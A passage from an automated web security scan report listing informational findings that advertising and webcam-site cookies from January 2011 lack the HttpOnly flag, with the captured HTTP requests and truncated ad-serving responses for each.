Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:02 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.532. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:53 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.533. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
    NSC_d12efm_qppm_iuuq
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.534. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Right HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.8.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="160"; var zflag_height="600"; var zflag_sz="7"; \n')
...[SNIP]...

11.535. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.5.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.536. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="11/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n'
...[SNIP]...

11.537. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n')
...[SNIP]...

11.538. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J3t|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1484
Content-Type: application/x-javascript

document.write ('<!-- begin ad tag-->\n');
document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.co
...[SNIP]...

11.539. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; NSC_d12efm_qppm_iuuq=ffffffff09419e4145525d5f4f58455e445a4a423660; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.35.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011PiwJwO101yed8|O1021J48; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.bostonherald.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1415
Content-Type: application/x-javascript

document.write ('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.bosherald/be_ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldin
...[SNIP]...

11.540. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="300"; var zflag_height="250"; var zflag_sz="9"; \n');

...[SNIP]...

11.541. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.11.10.1296251844

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:11 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="7/2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; \n')
...[SNIP]...

11.542. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@x05!x05 HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/track/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011PiwJwO101yed8; __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-1247593866-1296251843767; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; __utmb=235728274.20.10.1296251844

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:14:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 61
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4045525d5f4f58455e445a4a423660;path=/

document.write ('<script type="text/javascript"></script>');

11.543. http://oascentral.bostonherald.com/RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/bh.heraldinteractive.com/home/1392253820@Position1,Position2? HTTP/1.1
Host: oascentral.bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801DO8kADVvc; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:49:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1274
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e4145525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Position1') {
document.write ('<a href="http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/home/L29/396181020/Positio
...[SNIP]...

11.544. http://pu.imlive.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=bvm3hmbu4vshg5ioczqvkua2; path=/; HttpOnly
Set-Cookie: spvdr=vd=17b1032e-9627-4037-aed9-7b33fd1318f1&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:25:19 GMT; path=/
Set-Cookie: ipu=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 20659
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d
...[SNIP]...

11.545. http://pu.imlive.com/waccess/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pu.imlive.com
Path:   /waccess/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: pu.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: /webcam-login/
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=h4cuqa554gznzp3el2rkfgii; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h4cuqa554gznzp3el2rkfgii; path=/; HttpOnly
